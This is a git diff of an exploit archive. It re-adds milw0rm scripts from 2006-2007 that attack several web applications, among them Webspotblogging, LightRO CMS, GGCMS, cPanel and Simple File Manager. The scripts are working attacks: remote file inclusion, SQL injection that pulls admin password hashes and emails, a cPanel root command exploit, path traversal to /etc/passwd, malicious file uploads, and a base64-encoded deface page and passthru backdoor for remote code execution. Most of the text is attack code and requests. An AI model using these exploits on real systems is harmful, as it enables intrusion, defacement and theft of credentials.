-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-/*
-inc/logincheck.inc.php:
-[code]
-....
-include($path."inc/footer.inc.php");
-exit();
- }
-....
-[/code]
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- And more verbs in
- inc/adminheader.inc.php
- inc/global.php
- inc/mainheader.inc.php
-*/
-
-Expl:
-
-http://www.site.com/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
-http://www.site.com/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
-http://www.site.com/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
-http://www.site.com/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]
-
-#Pozdro dla wszystkich ;-)
-
-# milw0rm.com [2006-06-03]
+$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
+$$
+$$ Webspotblogging 3.0.1 (path) <= Remote File Include Vulnerability
+$$ Script site: http://blogging.webspot.co.uk/
+$$ dork: Powered by WebspotBlogging
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$ Find by: Kacper (a.k.a Rahim)
+$$
+$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
+$$ Adam, DeathSpeed, Drzewko, pepi
+$$
+$$ Specjal greetz: DragonHeart ;-)
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+/*
+inc/logincheck.inc.php:
+[code]
+....
+include($path."inc/footer.inc.php");
+exit();
+ }
+....
+[/code]
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ And more verbs in
+ inc/adminheader.inc.php
+ inc/global.php
+ inc/mainheader.inc.php
+*/
+
+Expl:
+
+http://www.site.com/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
+http://www.site.com/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
+http://www.site.com/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
+http://www.site.com/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]
+
+#Pozdro dla wszystkich ;-)
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1874.php b/platforms/php/webapps/1874.php
index 65c233516..81a4b125f 100755
--- a/platforms/php/webapps/1874.php
+++ b/platforms/php/webapps/1874.php
@@ -1,146 +1,146 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function is_hash($hash) -{ - if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} - else {return false;} -} - -$host=$argv[1]; -$path=$argv[2]; -$port=80; -$prefix="lt_"; -$proxy=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -if ($temp=="-T") -{ - $prefix=str_replace("-T","",$argv[$i]); -} -} -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$sql="9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*"; -$sql=urlencode($sql); -$packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -$temp=explode("articleId=",$html); -for ($i=1; $i<=count($temp); $i++) -{ -$temp2=explode("&",$temp[$i]); -if (is_hash($temp2[0])) -{ - echo "exploit succeeded...\r\n"; - echo "MD5 hash -> ".$temp2[0]."\r\n"; - $sql="9999/**/UNION/**/SELECT/**/user,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*"; - $sql=urlencode($sql); - $packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: ".$cookie."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - sendpacketii($packet); - $temp=explode("articleId=",$html); - $temp2=explode("&",$temp[$i]); - echo "admin -> ".$temp2[0]."\r\n"; - die; -} -} -//if you are here... 
-echo "exploit failed..."; -?> - -# milw0rm.com [2006-06-03] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function is_hash($hash) +{ + if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} + else {return false;} +} + +$host=$argv[1]; +$path=$argv[2]; +$port=80; +$prefix="lt_"; +$proxy=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +if ($temp=="-T") +{ + $prefix=str_replace("-T","",$argv[$i]); +} +} +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$sql="9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*"; +$sql=urlencode($sql); +$packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +$temp=explode("articleId=",$html); +for ($i=1; $i<=count($temp); $i++) +{ +$temp2=explode("&",$temp[$i]); +if (is_hash($temp2[0])) +{ + echo "exploit succeeded...\r\n"; + echo "MD5 hash -> ".$temp2[0]."\r\n"; + $sql="9999/**/UNION/**/SELECT/**/user,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*"; + $sql=urlencode($sql); + $packet ="GET ".$p."index.php?op=ViewArticle&articleId=".$sql."&blogId=1 HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: ".$cookie."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + $temp=explode("articleId=",$html); + $temp2=explode("&",$temp[$i]); + echo "admin -> ".$temp2[0]."\r\n"; + die; +} +} +//if you are here... +echo "exploit failed..."; +?> + +# milw0rm.com [2006-06-03] diff --git a/platforms/php/webapps/1875.htm b/platforms/php/webapps/1875.htm index 3bbd6ef0b..e230e048c 100755 --- a/platforms/php/webapps/1875.htm +++ b/platforms/php/webapps/1875.htm @@ -1,271 +1,271 @@ - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -Profile -
    - User Name - - - ajann
    - Membership Number - - 247
    - First Registered - - Sat 03 Jun 2006 at 09:20:14 pm
    - - Last Login - - Sat 03 Jun 2006 at 09:21:45 pm
    - Number of posts - - - 0
    - Status - - Member
    -Entries marked with a * are -required -
    -User Name * - - - -
    - Your Name - - -
    -Password * - - - -
    -Confirm Password * - - -
    -E-mail * - - -Hide Email Address? Yes -No -
    -Prefered Language - -
    - Homepage - -
    - -ICQ - -
    -AOL Instant Messenger (AIM) - -
    -Yahoo Instant Messenger (YIM) - -
    -Location* - -
    -Hobbies/Interests - -
    -Gender (M/F) - -
    -Date of Birth - - - -
    -Signature (< 100 characters) - - -
    -Use an Avatar ? -Current Avatar - - -No Avatar -
    -Upload Avatar ?
    (GIF, JPG or PNG only)
    - - -
    - -Submit - - - -
    - - - -# milw0rm.com [2006-06-04] + + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + " + Set calistir = objReg.Execute(metin) + baspassword = Replace(calistir.Item(0), "Password:" , "" ) + baspassword = Replace(baspassword, "" , "" ) + + + objReg.Pattern = "email:[A-Za-z0-9@.]+" + Set calistir = objReg.Execute(metin) + basemail = Replace(calistir.Item(0), "email:" , "" ) + basemail = Replace(basemail, "" , "" ) + +End If + + + +Set bulunanlar = Nothing +Set objReg = Nothing + +%> + +
    + +ajann

    + +
    +Profile +
    + User Name + + + ajann
    + Membership Number + + 247
    + First Registered + + Sat 03 Jun 2006 at 09:20:14 pm
    + + Last Login + + Sat 03 Jun 2006 at 09:21:45 pm
    + Number of posts + + + 0
    + Status + + Member
    +Entries marked with a * are +required +
    +User Name * + + + +
    + Your Name + + +
    +Password * + + + +
    +Confirm Password * + + +
    +E-mail * + + +Hide Email Address? Yes +No +
    +Prefered Language + +
    + Homepage + +
    + +ICQ + +
    +AOL Instant Messenger (AIM) + +
    +Yahoo Instant Messenger (YIM) + +
    +Location* + +
    +Hobbies/Interests + +
    +Gender (M/F) + +
    +Date of Birth + + + +
    +Signature (< 100 characters) + + -
    -Powered By Ashiyane Security Corporation www.Ashiyane.ir - - -# milw0rm.com [2006-10-13] + +cPanel <= 10.8.x cpwrap root exploit (PHP) +


    +



    Sorry Safe-mode Is On ( Script Not Work On This Server )




    "; +echo "


    Powered By Ashiyane Security Corporation
    www.Ashiyane.ir"; +exit(); +} + +$disablef = @ini_get("disable_functions"); +if (!empty($disablef)) +{ + $disablef = str_replace(" ","",$disablef); + $disablef = explode(",",$disablef); + if (in_array("passthru",$disablef)) + { + echo "




    Sorry Passthru Is Disable ( Script Not Work On This Server )




    "; + echo "


    Powered By Ashiyane Security Corporation
    www.Ashiyane.ir"; + exit(); + } +} + +?> + + +Command : + +",$ahash[1 ]); -$hash = $bhash[ 0]; - -if(strlen($hash) != 32){ -die("Exploit failed..\n"); -}else{ -die("Username: $name MD5: $hash\n"); -} -} -?> - -# milw0rm.com [2006-10-16] +#!/usr/bin/php +",$aname[1 ]); +$name = $bname[ 0]; +$ahash = explode( " - - - - - -
    - -# END LOCAL HTML FILE # -########################################################################################################################### -# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off # -# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files) # -########################################################################################################################### -\=========================================================================================================================/ - -/=========================================================================================================================\ -############################## .: Uploading of Malicious Files:. ########################################################## -# START LOCAL HTML FILE: # -
    - - - - - - - -
    -# END LOCAL HTML FILE # -########################################################################################################################### -# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it# -# will execute... EG: http://www.site.com/file/phpshell.php.off # -########################################################################################################################### -\=========================================================================================================================/ - - /++++++++++++++++++++++++++++\ - | Be good, and dont be too | - | hopeful about finding | - | yourself a gibbon running | - | this script. It predates | - | my #999999 hair. | - \++++++++++++++++++++++++++++/ - - /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\ - |---------------------------------------| - | <&bk> stfu flame | - | <~PhaZe_One> no fame without flame | - | <+c|p> I love you flame | - | <%emc2> flame wishes death upon you | - | are you emo flame? | - | <&[myg0t]40> flame dont be mad | - | *~str0ke humps flame's leg | - | <&ZoNe_VoRTeX> <3 flame | - |---------------------------------------| - \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/ - -# milw0rm.com [2006-12-02] +/*******************************************\ +| flame vrs Simple File Manager <=0.24=> | +| http://onedotoh.sourceforge.net/ | +| Various Vulnerbilities Including: | +\*******************************************/ +/+++++++++++++++++++++++++++++++++++++++++++\ +| Using the scripts supplied by the webapp: | +| Reading of Arbitrary files | +| Deletion of Arbitrary files | +| Modification of Arbitrary files | +| Creation of Arbitrary files | +| Uploading of Malicious files | +\+++++++++++++++++++++++++++++++++++++++++++/ + + +/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\ +| Simple File Manager (SFM) is a web based | +| file management utility. 
| +| It is designed to be used by those that | +| don't want to use ftp or SHOULD NOT use | +| ftp. It can be dropped into a specific | +| directory and give access to that | +| directory as well as any directory below | +| it, including those created by SFM. It | +| can be placed in a specific directory and | +| configured to give access to other | +| directories outside of its location | +| (centralized). SFM gives its user upload, | +| rename, delete, directory creation as | +| well as directory navigation (within its | +| tree limits), as well as Create New File; | +| it also includes an image viewer, text | +| viewer and mime type downloading. | +\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ + | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | + | Thats the description from the author...| + | Which basically outlines all of its | + | vulnerbilities. | + \_________________________________________/ + +/=========================================================================================================================\ +############################ .:Reading of Arbitrary Files:. ############################################################### +# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2 # +# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 # +########################################################################################################################### +\=========================================================================================================================/ + +/=========================================================================================================================\ +############################ .:Deletion of Arbirary Files:. 
############################################################### +# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext= # +# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext= # +########################################################################################################################### +\=========================================================================================================================/ + +/=========================================================================================================================\ +############################# .:Modification of Arbitrary Files:. ######################################################### +# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext= # +# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext= # +########################################################################################################################### +\=========================================================================================================================/ + +/=========================================================================================================================\ +############################# .:Creation of Arbitrary Files:. ############################################################# +# START LOCAL HTML FILE: # +
    +
    Filename: + + - - -[/code] - -Kacper :) -*/ -if ($argc<4) { -print_r(' --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -Usage: php '.$argv[0].' host path action {if action2: cmd} OPTIONS -host: target server (ip/hostname) -path: GGCMS path -action: 1 Remote Auto Deface Exploit - 2 Remote Code Execution Exploit -action2 {cmd: a shell command (ls -la)} -Options: - -p[port]: specify a port other than 80 - -P[ip:port]: specify a proxy -Example: -if action1: -php '.$argv[0].' 127.0.0.1 /GGCMS/ 1 -P1.1.1.1:80 -if action2: -php '.$argv[0].' 127.0.0.1 /GGCMS/ 2 ls -la -P1.1.1.1:80 --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -'); -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacket($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} -$host=$argv[1]; -$path=$argv[2]; -$action=(int)$argv[3]; -$cmd=""; -$port=80; -$proxy=""; -for ($i=4; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} -if (($action!=1) and ($action!=2)) {echo "select exploit action...";} -if ($action==1) -{ -$dt = base64_decode("PFNUWUxFID10ZXh0L2Nzcz5CT0RZIHsgDQpTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMD". -"AwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNI". -"QURPVy1DT0xPUjogZGFya2dyYXk7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjZWVlZW". -"VlOyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICMwMDAwMDA7IFNDUk9MTEJBUi1UUkFDSy1D". -"T0xPUjogZ3JheTsgU0NST0xMQkFSLURBUktTSEFET1ctQ09MT1I6ICMwMDAwMDAgDQp9IA". -"0KQTpsaW5rIHsgDQpDT0xPUjogZGFya2JsdWU7IFRFWFQtREVDT1JBVElPTjogbm9uZSAN". -"Cn0gDQpBOnZpc2l0ZWQgeyANCkNPTE9SOiAjMDAwMDg4OyBURVhULURFQ09SQVRJT046IG". -"5vbmUgDQp9IA0KQTpob3ZlciB7IA0KQ09MT1I6ICMwMDAwMDAgDQp9IA0KYm9keSwgdGQs". -"IHRoIHsgDQpjb2xvcjogIzAwMDAwMDsgDQp9IA0KdGFibGUsIHAsIHRkLCB0ciANCnsgDQ". -"p2aXNpYmlsaXR5OmhpZGRlbjsgDQp9IA0KYm9keSB7IA0KYmFja2dyb3VuZC1jb2xvcjog". -"IzAwMDAwMDsgDQpiYWNrZ3JvdW5kLWltYWdlOiB1cmwoImh0dHA6Ly9pbWc4OS5pbWFnZX". -"NoYWNrLnVzL2ltZzg5LzUxMjUvaGFja3BvNi5qcGciKTsgDQp9IA0KPC9TVFlMRT4gDQo8". 
-"c2NyaXB0IGxhbmd1YWdlPSJKYXZhU2NyaXB0Ij4gDQo8IS0tIA0KdmFyIGxlZnQ9InsiOy". -"ANCnZhciByaWdodD0ifSI7IA0KdmFyIG1zZz0iICAtIC0gSGFja2VkIEJ5IERFVklMIFRF". -"QU0gLjpXZSBPd256IFlvdSE6LiAtIC0gICI7IA0KdmFyIHNwZWVkPTIwMDsgDQpmdW5jdG". -"lvbiBzY3JvbGxfdGl0bGUoKSB7IA0KZG9jdW1lbnQudGl0bGU9bGVmdCttc2crcmlnaHQ7". -"IA0KbXNnPW1zZy5zdWJzdHJpbmcoMSxtc2cubGVuZ3RoKSttc2cuY2hhckF0KDApOyANCn". -"NldFRpbWVvdXQoInNjcm9sbF90aXRsZSgpIixzcGVlZCk7IA0KfSANCnNjcm9sbF90aXRs". -"ZSgpOyANCi8vIEVuZCAtLT4gDQo8L3NjcmlwdD4"); - -$data.='-----------------------------7d6224c08dc -Content-Disposition: form-data; name="saveSubpage" - -1 ------------------------------7d6224c08dc -Content-Disposition: form-data; name="subpageName" - -../../../templates/default/index ------------------------------7d6224c08dc -Content-Disposition: form-data; name="subpageContent" - -'.$dt.' ------------------------------7d6224c08dc-- -'; - -echo "Hack ...\n"; -$packet ="POST ".$p."admin/subpages.php HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacket($packet); -sleep(1); -$temp=explode('http://img89.imageshack.us/img89/5',$html); -$temp2=explode('25/hackpo6.jpg',$temp[1]); -$sprawdz=trim($temp2[0]); -if ($sprawdz == 1) - { -echo "look now to index.php!! ...\n"; - } -die("\n\nErr0r"); -} -elseif ($action==2) -{ -$hauru=base64_decode("Ijs/Pjw/cGhwIG9iX2NsZWFuKCk7Ly9SdWNob215IHphbWVrIEhhdXJ1IDs". -"tKWVjaG8iLi4uSGFja2VyLi5LYWNwZXIuLk1hZGUuLmluLi5Qb2xhbmQhIS". -"4uLkRFVklMLlRFQU0uLnRoZS4uYmVzdC4ucG9saXNoLi50ZWFtLi5HcmVld". -"HouLi4iO2VjaG8iLi4uR28gVG8gREVWSUwgVEVBTSBJUkM6IGlyYy5taWx3". -"MHJtLmNvbTo2NjY3ICNkZXZpbHRlYW0iO2VjaG8iLi4uREVWSUwgVEVBTSB". -"TSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvIjtpbmlfc2V0KCJtYX". -"hfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYXNzdGhydSgkX". 
-"1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+PD9waHAgZWNobyBLYWNwZXIg". -"SGFjayA6UCINCg0KDQo="); - -$data.='-----------------------------7d6224c08dc -Content-Disposition: form-data; name="saveSubpage" - -1 ------------------------------7d6224c08dc -Content-Disposition: form-data; name="subpageName" - -../../../templates/default/index ------------------------------7d6224c08dc -Content-Disposition: form-data; name="subpageContent" - -'.$hauru.' ------------------------------7d6224c08dc-- -'; - -echo "Insert Hauru!! ...\n"; -$packet ="POST ".$p."admin/subpages.php HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacket($packet); -sleep(1); - -echo "... now remote code execution...\n"; -$packet ="GET ".$p."index.php?page=index HTTP/1.1\r\n"; -$packet.="HAURU: ".$cmd."\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacket($packet); -if (strstr($html,"Hauru")) -{ -$temp=explode("Hauru",$html); -die($temp[1]); -} -echo "Exploit err0r :(\n"; -echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n"; -} -?> - -# milw0rm.com [2007-02-05] + +[/code] +.... +You can run exploit in html: +[code] + +Kacper Security & Hacking Blog :: DEVIL TEAM :: Exploit :: http://www.rahim.webd.pl/ +
    + + + -

    -
    - -
    -

    - -

    -
    - - - -<% -End If -%> - -<% -Response.Write "
    " -Response.Write "
    " -Response.Write "
    "
    -Response.Write ""
    -Response.Write "En iyi "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "1152x864 "
    -Response.Write ""
    -Response.Write "çözünürlük ve "
    -Response.Write "Firefox "
    -Response.Write "ile görüntülünebilir.
    " - -Response.Write "
    "
    -Response.Write ""
    -Response.Write "Exploit coded by "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "ajann"
    -Response.Write ""
    -Response.Write "
    " - -%> - -# milw0rm.com [2007-02-08] +<% Response.Buffer = True %> +<% On Error Resume Next %> +<% Server.ScriptTimeout = 100 %> + +<% +'=============================================================================================== +'[Script Name: LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit +'[Coded by : ajann +'[Author : ajann +'[Contact : :( +'[S.Page : http://www.lightro.de.tc/ +'[ExploitName: exploit2.asp + +'[Note : exploit file name =>exploit2.asp +'[Update: + Get Header +'[Update: + Get Whois Info +'=============================================================================================== + +%> + +<% + +title="LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit" 'Vuln Title + +%> + +<% = title %> + + + + + + + + + +
    +<% = title %> +

    + + + + + + +
    + TARGET:Example:[http://x.com/path]

    + USER ID:Example:[User + ID=1]

    +
    +
    +
    +
    +
    + +
    + +<% +islem = Request.QueryString("islem") + +If islem = "hata1" Then +Response.Write "There is a problem! Please complete to the whole spaces" +End If + +If islem = "hata2" Then +Response.Write "There is a problem! Please right character use" +End If + +If islem = "hata3" Then +Response.Write "There is a problem! Add ""http://""" +End If + +If islem = "hata4" Then +Response.Write "There is a problem! Just Numeric Character!" +End If + +%> + +<% + +If islem = "get" Then + +id= Request.Form("id") + +file="index.php?section=projects&ID=" +sql="-1'%20union%20select%200,1,6,7,8,9,2,3,4,5,10" +sql1=",concat(char(85,115,101,114,110,9" +sql2="7,109,101,58),name,char(32),char(80,97," +sql3="115,115,119,111,114,100,58),password" +sql4="),concat(char(101,109,97,105,108,58),email),1" +sql5="3,14,1,5,3,4,29%20from%20users%20where%20ID=" +sql6=id +sql7="/*" + + +idform = Request.Form("id") +targettext = Request.Form("text1") +arama=InStr(1, targettext, "union" ,1) +arama2=InStr(1, targettext, "http://" ,1) + +If targettext="" Then +Response.Redirect("exploit2.asp?islem=hata1") + +Else +If arama>0 then +Response.Redirect("exploit2.asp?islem=hata2") + +Else +If arama2=0 then +Response.Redirect("exploit2.asp?islem=hata3") + +Else +IF Not IsNumeric(idform) Then +Response.Redirect("exploit2.asp?islem=hata4") + +Else +%> + +<% + +target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6+sql7 + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd + +take = .Responsetext +End With +SET objtake = Nothing +End Function + + +get_username = take(target1) + +getdata=InStr(get_username,"0 0/" ) +username=Mid(get_username,getdata+5,90) + +Dim metin +metin = take(target1) + +Dim objReg +Set objReg = New RegExp +objReg.Global = False +objReg.IgnoreCase = True + +objReg.Pattern = "Username:[A-Za-z0-9ý]+ Pass" +Dim calistir, istediginString +Set calistir = objReg.Execute(metin) + + +If calistir.Count = 0 Then 
+ Response.write "Not True" +Else + basusername = Replace(calistir.Item(0), "Username:" , "" ) + basusername = Replace(basusername, " Pass" , "" ) + + + + objReg.Pattern = "Password:[A-Za-z0-9ý]+
    + + + + + + + + + + + + + + + +
            +      + Username:<%=basusername%>

    +
            +      + Password:<%=baspassword%>

    +
            +      + Email:<%=basemail%>

    +
    +
    + +
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
